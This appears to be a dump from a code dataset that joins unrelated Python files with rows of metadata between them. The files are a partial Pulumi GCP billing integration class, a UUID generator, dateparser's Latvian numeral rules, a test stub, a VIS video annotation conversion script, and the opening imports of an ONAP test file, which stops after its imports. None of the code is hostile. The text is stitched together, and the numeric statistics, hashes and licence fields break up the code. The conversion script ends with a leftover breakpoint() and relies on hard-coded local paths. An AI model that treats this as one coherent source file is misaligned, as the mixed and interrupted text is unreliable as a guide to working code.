force_save: Optional[pulumi.Input[bool]] = None,
json_key: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
service: Optional[pulumi.Input[str]] = None,
service_refresh_rate_in_minutes: Optional[pulumi.Input[int]] = None) -> 'CloudIntegrationGcpBilling':
"""
Get an existing CloudIntegrationGcpBilling resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] additional_tags: A list of point tag key-values to add to every point ingested using this integration
:param pulumi.Input[str] api_key: API key for Google Cloud Platform (GCP)
:param pulumi.Input[bool] force_save: Forces this resource to save, even if errors are present
:param pulumi.Input[str] json_key: Private key for a Google Cloud Platform (GCP) service account within your project.
The account must be at least granted Monitoring Viewer permissions. This key must be in the JSON format generated by GCP.
:param pulumi.Input[str] name: The human-readable name of this integration
:param pulumi.Input[str] project_id: The Google Cloud Platform (GCP) Project Id
:param pulumi.Input[str] service: A value denoting which cloud service this service integrates with
:param pulumi.Input[int] service_refresh_rate_in_minutes: How often, in minutes, to refresh the service
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _CloudIntegrationGcpBillingState.__new__(_CloudIntegrationGcpBillingState)
__props__.__dict__["additional_tags"] = additional_tags
__props__.__dict__["api_key"] = api_key
__props__.__dict__["force_save"] = force_save
__props__.__dict__["json_key"] = json_key
__props__.__dict__["name"] = name
__props__.__dict__["project_id"] = project_id
__props__.__dict__["service"] = service
__props__.__dict__["service_refresh_rate_in_minutes"] = service_refresh_rate_in_minutes
return CloudIntegrationGcpBilling(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="additionalTags")
def additional_tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A list of point tag key-values to add to every point ingested using this integration
"""
return pulumi.get(self, "additional_tags")
@property
@pulumi.getter(name="apiKey")
def api_key(self) -> pulumi.Output[str]:
"""
API key for Google Cloud Platform (GCP)
"""
return pulumi.get(self, "api_key")
@property
@pulumi.getter(name="forceSave")
def force_save(self) -> pulumi.Output[Optional[bool]]:
"""
Forces this resource to save, even if errors are present
"""
return pulumi.get(self, "force_save")
@property
@pulumi.getter(name="jsonKey")
def json_key(self) -> pulumi.Output[str]:
"""
Private key for a Google Cloud Platform (GCP) service account within your project.
The account must be at least granted Monitoring Viewer permissions. This key must be in the JSON format generated by GCP.
"""
return pulumi.get(self, "json_key")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The human-readable name of this integration
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
The Google Cloud Platform (GCP) Project Id
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter
def service(self) -> pulumi.Output[str]:
"""
A value denoting which cloud service this service integrates with
"""
return pulumi.get(self, "service")
@property
@pulumi.getter(name="serviceRefreshRateInMinutes")
def service_refresh_rate_in_minutes(self) -> pulumi.Output[Optional[int]]:
"""
How often, in minutes, to refresh the service
"""
return pulumi.get(self, "service_refresh_rate_in_minutes")
| 44.065543
| 162
| 0.653393
| 2,852
| 23,531
| 5.169705
| 0.070827
| 0.090274
| 0.075963
| 0.04924
| 0.864623
| 0.848142
| 0.835052
| 0.810092
| 0.802835
| 0.793136
| 0
| 0.002092
| 0.248353
| 23,531
| 533
| 163
| 44.148218
| 0.831515
| 0.329905
| 0
| 0.726962
| 1
| 0
| 0.103565
| 0.035376
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16041
| false
| 0.003413
| 0.017065
| 0
| 0.273038
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c5adec84caad83e591889aed74bb615e91728c5a
| 369
|
py
|
Python
|
clean/utils/unique.py
|
bahnlink/pyclean
|
558d75341082472606788e088809831f6ea543c0
|
[
"MIT"
] | null | null | null |
clean/utils/unique.py
|
bahnlink/pyclean
|
558d75341082472606788e088809831f6ea543c0
|
[
"MIT"
] | 2
|
2021-03-25T21:49:39.000Z
|
2021-06-01T22:12:00.000Z
|
clean/utils/unique.py
|
bahnlink/pyclean
|
558d75341082472606788e088809831f6ea543c0
|
[
"MIT"
] | 1
|
2018-06-07T17:31:56.000Z
|
2018-06-07T17:31:56.000Z
|
import uuid
import shortuuid
class UniqueGenerator:
@staticmethod
def generate() -> str:
raise NotImplementedError
class UUIDGenerator(UniqueGenerator):
@staticmethod
def generate():
return str(uuid.uuid4())
class ShortUUIDGenerator(UniqueGenerator):
@staticmethod
def generate() -> str:
return shortuuid.uuid()
| 15.375
| 42
| 0.682927
| 32
| 369
| 7.875
| 0.46875
| 0.321429
| 0.357143
| 0.452381
| 0.325397
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003534
| 0.233062
| 369
| 23
| 43
| 16.043478
| 0.886926
| 0
| 0
| 0.357143
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.214286
| true
| 0
| 0.142857
| 0.142857
| 0.714286
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
a839aa9842344290eb2d1e9b4ac059cc4477ba14
| 3,023
|
py
|
Python
|
dateparser/data/numeral_translation_data/lv.py
|
bazingarj/dateparser
|
48c4563fb7f6ce685fbd6d27e9e83257521d2203
|
[
"BSD-3-Clause"
] | 8
|
2019-11-15T21:00:15.000Z
|
2021-12-21T22:09:42.000Z
|
dateparser/data/numeral_translation_data/lv.py
|
bazingarj/dateparser
|
48c4563fb7f6ce685fbd6d27e9e83257521d2203
|
[
"BSD-3-Clause"
] | 9
|
2020-06-05T21:28:57.000Z
|
2022-02-12T12:30:39.000Z
|
dateparser/data/numeral_translation_data/lv.py
|
bazingarj/dateparser
|
48c4563fb7f6ce685fbd6d27e9e83257521d2203
|
[
"BSD-3-Clause"
] | 21
|
2019-03-11T04:25:23.000Z
|
2022-02-03T08:54:33.000Z
|
# -*- coding: utf-8 -*-
info = {
"%%spellout-prefixed": {
"0": "ERROR;",
"1": "vien;",
"2": "div;",
"3": "trīs;",
"4": "četr;",
"5": "piec;",
"6": "seš;",
"7": "septiņ;",
"8": "astoņ;",
"9": "deviņ;",
"(10, 'inf')": "ERROR;"
},
"%spellout-cardinal-feminine": {
"0": "nulle;",
"1": "viena;",
"2": "divas;",
"3": "trīs;",
"4": "četras;",
"5": "piecas;",
"6": "sešas;",
"7": "septiņas;",
"8": "astoņas;",
"9": "deviņas;",
"(10, 19)": "=%spellout-cardinal-masculine=;",
"(20, 99)": "<%%spellout-prefixed<desmit[ >>];",
"(100, 199)": "simt[ >>];",
"(200, 999)": "<%%spellout-prefixed<simt[ >>];",
"(1000, 1999)": "tūkstoš[ >>];",
"(2000, 999999)": "<%%spellout-prefixed<tūkstoš[ >>];",
"(1000000, 1999999)": "viens miljons[ >>];",
"(2000000, 999999999)": "<%spellout-cardinal-masculine< miljoni[ >>];",
"(1000000000, 1999999999)": "viens miljards[ >>];",
"(2000000000, 999999999999)": "<%spellout-cardinal-masculine< miljardi[ >>];",
"(1000000000000, 1999999999999)": "viens biljons[ >>];",
"(2000000000000, 999999999999999)": "<%spellout-cardinal-masculine< biljoni[ >>];",
"(1000000000000000, 1999999999999999)": "viens biljards[ >>];",
"(2000000000000000, 999999999999999999)": "<%spellout-cardinal-masculine< biljardi[ >>];",
"(1000000000000000000, 'inf')": "=#,##0=;"
},
"%spellout-cardinal-masculine": {
"0": "nulle;",
"1": "viens;",
"2": "divi;",
"3": "trīs;",
"4": "četri;",
"5": "pieci;",
"6": "seši;",
"7": "septiņi;",
"8": "astoņi;",
"9": "deviņi;",
"10": "desmit;",
"(11, 19)": ">%%spellout-prefixed>padsmit;",
"(20, 99)": "<%%spellout-prefixed<desmit[ >>];",
"(100, 199)": "simt[ >>];",
"(200, 999)": "<%%spellout-prefixed<simt[ >>];",
"(1000, 1999)": "tūkstoš[ >>];",
"(2000, 999999)": "<%%spellout-prefixed<tūkstoš[ >>];",
"(1000000, 1999999)": "viens miljons[ >>];",
"(2000000, 999999999)": "<%spellout-cardinal-masculine< miljoni[ >>];",
"(1000000000, 1999999999)": "viens miljards[ >>];",
"(2000000000, 999999999999)": "<%spellout-cardinal-masculine< miljardi[ >>];",
"(1000000000000, 1999999999999)": "viens biljons[ >>];",
"(2000000000000, 999999999999999)": "<%spellout-cardinal-masculine< biljoni[ >>];",
"(1000000000000000, 1999999999999999)": "viens biljards[ >>];",
"(2000000000000000, 999999999999999999)": "<%spellout-cardinal-masculine< biljardi[ >>];",
"(1000000000000000000, 'inf')": "=#,##0=;"
},
"%spellout-numbering": {
"(0, 'inf')": "=%spellout-cardinal-masculine=;"
},
"%spellout-numbering-year": {
"(0, 'inf')": "=%spellout-numbering=;"
}
}
| 39.25974
| 98
| 0.474032
| 229
| 3,023
| 6.257642
| 0.393013
| 0.133985
| 0.191905
| 0.027913
| 0.71598
| 0.71598
| 0.71598
| 0.71598
| 0.71598
| 0.71598
| 0
| 0.239198
| 0.25736
| 3,023
| 77
| 99
| 39.25974
| 0.399109
| 0.006947
| 0
| 0.434211
| 0
| 0
| 0.628457
| 0.213262
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a859323fd81f195b482800ac1c0765c58ea04512
| 38
|
py
|
Python
|
tests/py_tests/test_faint/paths.py
|
lukas-ke/faint-graphics-editor
|
33eb9e6a3f2216fb2cf6ef9709a14f3d20b78fbf
|
[
"Apache-2.0"
] | 10
|
2016-12-28T22:06:31.000Z
|
2021-05-24T13:42:30.000Z
|
tests/py_tests/test_faint/paths.py
|
lukas-ke/faint-graphics-editor
|
33eb9e6a3f2216fb2cf6ef9709a14f3d20b78fbf
|
[
"Apache-2.0"
] | 4
|
2015-10-09T23:55:10.000Z
|
2020-04-04T08:09:22.000Z
|
tests/py_tests/test_faint/paths.py
|
lukas-ke/faint-graphics-editor
|
33eb9e6a3f2216fb2cf6ef9709a14f3d20b78fbf
|
[
"Apache-2.0"
] | null | null | null |
def get_test_out_path():
return
| 12.666667
| 25
| 0.684211
| 6
| 38
| 3.833333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.236842
| 38
| 2
| 26
| 19
| 0.793103
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
a86d6b6f0079e5d4a0d096ee6f48b2fc4b60e24f
| 20,255
|
py
|
Python
|
datasets/convert_vis_val1.py
|
deeplearning-wisc/stud
|
b667a369e368181ef6e913c32f26e574bead9b56
|
[
"Apache-2.0"
] | 22
|
2022-03-09T03:13:10.000Z
|
2022-03-31T02:45:50.000Z
|
datasets/convert_vis_val1.py
|
deeplearning-wisc/stud
|
b667a369e368181ef6e913c32f26e574bead9b56
|
[
"Apache-2.0"
] | 1
|
2022-03-22T12:27:38.000Z
|
2022-03-22T22:45:46.000Z
|
datasets/convert_vis_val1.py
|
deeplearning-wisc/stud
|
b667a369e368181ef6e913c32f26e574bead9b56
|
[
"Apache-2.0"
] | 2
|
2022-03-21T02:32:53.000Z
|
2022-03-22T18:43:52.000Z
|
import json
import numpy as np
video = json.load(open('/nobackup-slow/dataset/my_xfdu/video/vis/train/instances.json'))
all_video_id = list(range(1, len(video['videos']) + 1))
num_train_video = int(len(all_video_id) * 0.8)
all_categories = [{'supercategory': 'object', 'id': 1, 'name': 'airplane'}, {'supercategory': 'object', 'id': 2, 'name': 'bear'},
{'supercategory': 'object', 'id': 3, 'name': 'bird'}, {'supercategory': 'object', 'id': 4, 'name': 'boat'},
{'supercategory': 'object', 'id': 5, 'name': 'car'}, {'supercategory': 'object', 'id': 6, 'name': 'cat'},
{'supercategory': 'object', 'id': 7, 'name': 'cow'}, {'supercategory': 'object', 'id': 8, 'name': 'deer'},
{'supercategory': 'object', 'id': 9, 'name': 'dog'}, {'supercategory': 'object', 'id': 10, 'name': 'duck'},
{'supercategory': 'object', 'id': 11, 'name': 'earless_seal'}, {'supercategory': 'object', 'id': 12, 'name': 'elephant'},
{'supercategory': 'object', 'id': 13, 'name': 'fish'}, {'supercategory': 'object', 'id': 14, 'name': 'flying_disc'},
{'supercategory': 'object', 'id': 15, 'name': 'fox'}, {'supercategory': 'object', 'id': 16, 'name': 'frog'},
{'supercategory': 'object', 'id': 17, 'name': 'giant_panda'}, {'supercategory': 'object', 'id': 18, 'name': 'giraffe'},
{'supercategory': 'object', 'id': 19, 'name': 'horse'}, {'supercategory': 'object', 'id': 20, 'name': 'leopard'},
{'supercategory': 'object', 'id': 21, 'name': 'lizard'}, {'supercategory': 'object', 'id': 22, 'name': 'monkey'},
{'supercategory': 'object', 'id': 23, 'name': 'motorbike'}, {'supercategory': 'object', 'id': 24, 'name': 'mouse'},
{'supercategory': 'object', 'id': 25, 'name': 'parrot'}, {'supercategory': 'object', 'id': 26, 'name': 'person'},
{'supercategory': 'object', 'id': 27, 'name': 'rabbit'}, {'supercategory': 'object', 'id': 28, 'name': 'shark'},
{'supercategory': 'object', 'id': 29, 'name': 'skateboard'}, {'supercategory': 'object', 'id': 30, 'name': 'snake'},
{'supercategory': 'object', 'id': 31, 'name': 'snowboard'}, {'supercategory': 'object', 'id': 32, 'name': 'squirrel'},
{'supercategory': 'object', 'id': 33, 'name': 'surfboard'}, {'supercategory': 'object', 'id': 34, 'name': 'tennis_racket'},
{'supercategory': 'object', 'id': 35, 'name': 'tiger'}, {'supercategory': 'object', 'id': 36, 'name': 'train'},
{'supercategory': 'object', 'id': 37, 'name': 'truck'}, {'supercategory': 'object', 'id': 38, 'name': 'turtle'},
{'supercategory': 'object', 'id': 39, 'name': 'whale'}, {'supercategory': 'object', 'id': 40, 'name': 'zebra'}]
removed_class_id = [3,4,7,10,11,13,14,15,16,20,21,22,24,25,28,31,32,33,34,36,38,39,40]
tranformation_dict = {1:1,2:2,5:3,6:4,8:5,9:6,12:7,17:8,18:9,19:10,23:11,26:12,27:13,
29:14,30:15,35:16,37:17}
kept_categories = [{'supercategory': 'object', 'id': 1, 'name': 'airplane'}, {'supercategory': 'object', 'id': 2, 'name': 'bear'},
{'supercategory': 'object', 'id': 3, 'name': 'car'}, {'supercategory': 'object', 'id': 4, 'name': 'cat'},
{'supercategory': 'object', 'id': 5, 'name': 'deer'},
{'supercategory': 'object', 'id': 6, 'name': 'dog'},
{'supercategory': 'object', 'id': 7, 'name': 'elephant'},
{'supercategory': 'object', 'id': 8, 'name': 'giant_panda'}, {'supercategory': 'object', 'id': 9, 'name': 'giraffe'},
{'supercategory': 'object', 'id': 10, 'name': 'horse'},
{'supercategory': 'object', 'id': 11, 'name': 'motorbike'}, {'supercategory': 'object', 'id': 12, 'name': 'person'},
{'supercategory': 'object', 'id': 13, 'name': 'rabbit'},
{'supercategory': 'object', 'id': 14, 'name': 'skateboard'}, {'supercategory': 'object', 'id': 15, 'name': 'snake'},
{'supercategory': 'object', 'id': 16, 'name': 'tiger'},
{'supercategory': 'object', 'id': 17, 'name': 'truck'}, ]
video_info_train = []
video_info_val = []
images_train = []
images_val = []
id_train = 1
id_val = 1
id_image_train = 1
id_image_val = 1
# breakpoint()
for info in video['videos']:
if id_train <= num_train_video:
video_info_train.append({'id': id_train, 'name': info['file_names'][0].split('/')[0]})
for index in range(len(info['file_names'])):
image_info = {'file_name': info['file_names'][index],
'height': info['height'], 'width': info['width'], 'id': id_image_train, 'video_id': id_train, 'frame_id': index}
images_train.append(image_info)
id_image_train += 1
id_train += 1
else:
video_info_val.append({'id': id_val, 'name': info['file_names'][0].split('/')[0]})
for index in range(len(info['file_names'])):
image_info = {'file_name': info['file_names'][index],
'height': info['height'], 'width': info['width'], 'id': id_image_val, 'video_id': id_val, 'frame_id': index}
images_val.append(image_info)
id_image_val += 1
id_val += 1
'''
>>> data['images'][101]
{'file_name': 'b1c66a42-6f7d68ca/b1c66a42-6f7d68ca-0000102.jpg',
'height': 720, 'width': 1280, 'id': 102, 'video_id': 1, 'frame_id': 101}
'''
# breakpoint()
annotation_train = []
annotation_val = []
id_train = 1
id_train_image = 1
id_val = 1
id_val_image = 1
pre_video_id = -1 #video['annotations'][0]['video_id']
for index1 in range(len(video['annotations'])):
if video['annotations'][index1]['video_id'] <= num_train_video:
if pre_video_id != video['annotations'][index1]['video_id']:
cur_video_ann = {}
for index in range(len(video['annotations'][index1]['bboxes'])):
cur_video_ann[index] = []
for index in range(len(video['annotations'][index1]['bboxes'])):
if video['annotations'][index1]['category_id'] not in removed_class_id:
cur_video_ann[index].append([video['annotations'][index1]['bboxes'][index],
video['annotations'][index1]['areas'][index],
video['annotations'][index1]['iscrowd'],
tranformation_dict[video['annotations'][index1]['category_id']]])
else:
cur_video_ann[index].append([None,
video['annotations'][index1]['areas'][index],
video['annotations'][index1]['iscrowd'],
video['annotations'][index1]['category_id']])
# annotation_train.append({'id':id_train, 'image_id'})
if index1 == len(video['annotations']) - 1 or video['annotations'][index1]['video_id'] != video['annotations'][index1+1]['video_id']:
for key in list(cur_video_ann.keys()):
instance_id = 1
# print(id_train_image)
for item in cur_video_ann[key]:
if item[0] is None:
annotation_train.append({'id': id_train, 'image_id': id_train_image, 'category_id': item[3],
'instances_id': instance_id,
'bdd100k_id': 0, 'occluded': False, 'truncated': False,
'bbox': item[0], 'area': item[1], 'iscrowd': item[2], 'ignore': 1
})
else:
annotation_train.append({'id': id_train, 'image_id': id_train_image, 'category_id': item[3],
'instances_id': instance_id,
'bdd100k_id': 0, 'occluded': False, 'truncated': False,
'bbox': item[0], 'area': item[1], 'iscrowd': item[2], 'ignore': 0
})
instance_id += 1
id_train += 1
id_train_image += 1
pre_video_id = video['annotations'][index1]['video_id']
else:
if pre_video_id != video['annotations'][index1]['video_id']:
cur_video_ann = {}
for index in range(len(video['annotations'][index1]['bboxes'])):
cur_video_ann[index] = []
for index in range(len(video['annotations'][index1]['bboxes'])):
if video['annotations'][index1]['category_id'] not in removed_class_id:
cur_video_ann[index].append([video['annotations'][index1]['bboxes'][index],
video['annotations'][index1]['areas'][index],
video['annotations'][index1]['iscrowd'],
tranformation_dict[video['annotations'][index1]['category_id']]])
else:
cur_video_ann[index].append([None,
video['annotations'][index1]['areas'][index],
video['annotations'][index1]['iscrowd'],
video['annotations'][index1]['category_id']])
# annotation_train.append({'id':id_train, 'image_id'})
if index1 == len(video['annotations']) - 1 or video['annotations'][index1]['video_id'] != video['annotations'][index1+1]['video_id']:
for key in list(cur_video_ann.keys()):
instance_id = 1
for item in cur_video_ann[key]:
if item[0] is None:
annotation_val.append({'id': id_val, 'image_id': id_val_image, 'category_id': item[3],
'instances_id': instance_id,
'bdd100k_id': 0, 'occluded': False, 'truncated': False,
'bbox': item[0], 'area': item[1], 'iscrowd': item[2], 'ignore': 1
})
else:
annotation_val.append({'id': id_val, 'image_id': id_val_image, 'category_id': item[3],
'instances_id': instance_id,
'bdd100k_id': 0, 'occluded': False, 'truncated': False,
'bbox': item[0], 'area': item[1], 'iscrowd': item[2], 'ignore': 0
})
instance_id += 1
id_val += 1
id_val_image += 1
pre_video_id = video['annotations'][index1]['video_id']
'''
{'id': 301, 'image_id': 11, 'category_id': 3,
'instance_id': 25, 'bdd100k_id': '00122086',
'occluded': True, 'truncated': False,
'bbox': [664.2417908674067, 367.9733233708366, 36.698191808020056, 28.229378313861503],
'area': 1035.9671399832512, 'iscrowd': 0, 'ignore': 0,
'segmentation':
[[664.2417908674067, 367.9733233708366, 664.2417908674067, 396.2027016846981,
700.9399826754268, 396.2027016846981, 700.9399826754268, 367.9733233708366]]}
'''
new_annotation = dict()
new_annotation['categories'] = kept_categories#video['categories']
new_annotation['videos'] = video_info_train
new_annotation['images'] = images_train
new_annotation['annotations'] = annotation_train
json.dump(new_annotation, open('/nobackup-slow/dataset/my_xfdu/video/vis/train/instances_train.json', 'w'))
new_annotation['videos'] = video_info_val
new_annotation['images'] = images_val
new_annotation['annotations'] = annotation_val
json.dump(new_annotation, open('/nobackup-slow/dataset/my_xfdu/video/vis/train/instances_test.json', 'w'))
#
# # postprocessing.
train_data = json.load(open('/nobackup-slow/dataset/my_xfdu/video/vis/train/instances_train.json'))
not_none_image_id = []
for ann in train_data['annotations']:
if ann['bbox'] is not None:
not_none_image_id.append(ann['image_id'])
full_image_id = list(range(1, train_data['annotations'][-1]['image_id']+1))
none_image_id_train = list(set(full_image_id).difference(set(not_none_image_id)))
# breakpoint()
test_data = json.load(open('/nobackup-slow/dataset/my_xfdu/video/vis/train/instances_test.json'))
not_none_image_id = []
for ann in test_data['annotations']:
if ann['bbox'] is not None:
not_none_image_id.append(ann['image_id'])
full_image_id = list(range(1, test_data['annotations'][-1]['image_id']+1))
none_image_id_test = list(set(full_image_id).difference(set(not_none_image_id)))
# breakpoint()
video_info_train = []
video_info_val = []
images_train = []
images_val = []
id_train = 1
id_val = 1
id_image_train = 1
id_image_val = 1
id_real_image_train = 1
id_real_image_val = 1
for info in video['videos']:
if id_train <= num_train_video:
video_info_train.append({'id': id_train, 'name': info['file_names'][0].split('/')[0]})
temp = 0
for index in range(len(info['file_names'])):
if id_image_train not in none_image_id_train:
image_info = {'file_name': info['file_names'][index],
'height': info['height'], 'width': info['width'], 'id': id_real_image_train,
'video_id': id_train, 'frame_id': temp}
temp += 1
images_train.append(image_info)
id_real_image_train += 1
id_image_train += 1
id_train += 1
else:
video_info_val.append({'id': id_val, 'name': info['file_names'][0].split('/')[0]})
temp = 0
for index in range(len(info['file_names'])):
if id_image_val not in none_image_id_test:
image_info = {'file_name': info['file_names'][index],
'height': info['height'], 'width': info['width'], 'id': id_real_image_val,
'video_id': id_val, 'frame_id': temp}
temp += 1
images_val.append(image_info)
id_real_image_val += 1
id_image_val += 1
id_val += 1
'''
>>> data['images'][101]
{'file_name': 'b1c66a42-6f7d68ca/b1c66a42-6f7d68ca-0000102.jpg',
'height': 720, 'width': 1280, 'id': 102, 'video_id': 1, 'frame_id': 101}
'''
# breakpoint()
annotation_train = []
annotation_val = []
id_train = 1
id_train_image = 1
id_val = 1
id_val_image = 1
id_real_val_image = 1
id_real_train_image = 1
pre_video_id = -1 #video['annotations'][0]['video_id']
for index1 in range(len(video['annotations'])):
if video['annotations'][index1]['video_id'] <= num_train_video:
if pre_video_id != video['annotations'][index1]['video_id']:
cur_video_ann = {}
for index in range(len(video['annotations'][index1]['bboxes'])):
cur_video_ann[index] = []
for index in range(len(video['annotations'][index1]['bboxes'])):
if video['annotations'][index1]['category_id'] not in removed_class_id:
cur_video_ann[index].append([video['annotations'][index1]['bboxes'][index],
video['annotations'][index1]['areas'][index],
video['annotations'][index1]['iscrowd'],
tranformation_dict[video['annotations'][index1]['category_id']]])
else:
cur_video_ann[index].append([None,
video['annotations'][index1]['areas'][index],
video['annotations'][index1]['iscrowd'],
video['annotations'][index1]['category_id']])
# annotation_train.append({'id':id_train, 'image_id'})
if index1 == len(video['annotations']) - 1 or video['annotations'][index1]['video_id'] != video['annotations'][index1+1]['video_id']:
for key in list(cur_video_ann.keys()):
instance_id = 1
# print(id_train_image)
for item in cur_video_ann[key]:
# assert item[0] is not None
if item[0] is not None:
annotation_train.append({'id': id_train, 'image_id': id_real_train_image, 'category_id': item[3],
'instances_id': instance_id,
'bdd100k_id': 0, 'occluded': False, 'truncated': False,
'bbox': item[0], 'area': item[1], 'iscrowd': item[2], 'ignore': 0
})
assert item[3] <= 17
instance_id += 1
id_train += 1
if id_train_image not in none_image_id_train:
id_real_train_image += 1
id_train_image += 1
pre_video_id = video['annotations'][index1]['video_id']
else:
if pre_video_id != video['annotations'][index1]['video_id']:
cur_video_ann = {}
for index in range(len(video['annotations'][index1]['bboxes'])):
cur_video_ann[index] = []
for index in range(len(video['annotations'][index1]['bboxes'])):
if video['annotations'][index1]['category_id'] not in removed_class_id:
cur_video_ann[index].append([video['annotations'][index1]['bboxes'][index],
video['annotations'][index1]['areas'][index],
video['annotations'][index1]['iscrowd'],
tranformation_dict[video['annotations'][index1]['category_id']]])
else:
cur_video_ann[index].append([None,
video['annotations'][index1]['areas'][index],
video['annotations'][index1]['iscrowd'],
video['annotations'][index1]['category_id']])
# annotation_train.append({'id':id_train, 'image_id'})
if index1 == len(video['annotations']) - 1 or video['annotations'][index1]['video_id'] != video['annotations'][index1+1]['video_id']:
for key in list(cur_video_ann.keys()):
instance_id = 1
for item in cur_video_ann[key]:
# assert item[0] is not None
if item[0] is not None:
annotation_val.append({'id': id_val, 'image_id': id_real_val_image, 'category_id': item[3],
'instances_id': instance_id,
'bdd100k_id': 0, 'occluded': False, 'truncated': False,
'bbox': item[0], 'area': item[1], 'iscrowd': item[2], 'ignore': 0
})
assert item[3] <= 17
instance_id += 1
id_val += 1
if id_val_image not in none_image_id_test:
id_real_val_image += 1
id_val_image += 1
pre_video_id = video['annotations'][index1]['video_id']
new_annotation = dict()
new_annotation['categories'] = kept_categories#video['categories']
new_annotation['videos'] = video_info_train
new_annotation['images'] = images_train
new_annotation['annotations'] = annotation_train
json.dump(new_annotation, open('/nobackup-slow/dataset/my_xfdu/video/vis/train/instances_train.json', 'w'))
new_annotation['videos'] = video_info_val
new_annotation['images'] = images_val
new_annotation['annotations'] = annotation_val
json.dump(new_annotation, open('/nobackup-slow/dataset/my_xfdu/video/vis/train/instances_test.json', 'w'))
breakpoint()
| 55.953039
| 141
| 0.526142
| 2,223
| 20,255
| 4.573099
| 0.088169
| 0.103876
| 0.125516
| 0.037183
| 0.879697
| 0.771592
| 0.734802
| 0.73431
| 0.720539
| 0.713653
| 0
| 0.051147
| 0.305011
| 20,255
| 361
| 142
| 56.108033
| 0.671024
| 0.024636
| 0
| 0.764505
| 0
| 0
| 0.234029
| 0.024306
| 0
| 0
| 0
| 0
| 0.006826
| 1
| 0
| false
| 0
| 0.006826
| 0
| 0.006826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a88e05ddea54b9bb4e52ec3fae22b523ca65f2af
| 123,294
|
py
|
Python
|
lcm/ns_vnfs/tests/tests.py
|
onap/vfc-nfvo-lcm
|
b7d4d015fa96a246d73d863092d3362afcedc284
|
[
"Apache-2.0"
] | 4
|
2018-08-29T02:51:38.000Z
|
2021-11-16T11:36:11.000Z
|
lcm/ns_vnfs/tests/tests.py
|
onap/vfc-nfvo-lcm
|
b7d4d015fa96a246d73d863092d3362afcedc284
|
[
"Apache-2.0"
] | null | null | null |
lcm/ns_vnfs/tests/tests.py
|
onap/vfc-nfvo-lcm
|
b7d4d015fa96a246d73d863092d3362afcedc284
|
[
"Apache-2.0"
] | 1
|
2019-05-12T08:21:19.000Z
|
2019-05-12T08:21:19.000Z
|
# Copyright 2016-2017 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import uuid
import time
import mock
from django.test import TestCase, Client
from rest_framework import status
from lcm.ns_vnfs.biz.grant_vnfs import GrantVnfs
from lcm.pub.database.models import VLInstModel, NfInstModel, JobModel, NSInstModel, VmInstModel, \
OOFDataModel, VNFCInstModel, PortInstModel, CPInstModel, SubscriptionModel
from lcm.pub.exceptions import NSLCMException
from lcm.pub.utils import restcall
from lcm.jobs.enum import JOB_MODEL_STATUS, JOB_TYPE, JOB_ACTION, JOB_PROGRESS
from lcm.pub.utils.jobutil import JobUtil
from lcm.pub.utils.timeutil import now_time
from lcm.pub.utils.values import ignore_case_get
from lcm.ns_vnfs.biz.grant_vnf import GrantVnf
from lcm.ns_vnfs.biz.heal_vnfs import NFHealService
from lcm.ns_vnfs.biz.scale_vnfs import NFManualScaleService
from lcm.ns_vnfs.biz.subscribe import SubscriptionDeletion
from lcm.ns_vnfs.biz.terminate_nfs import TerminateVnfs
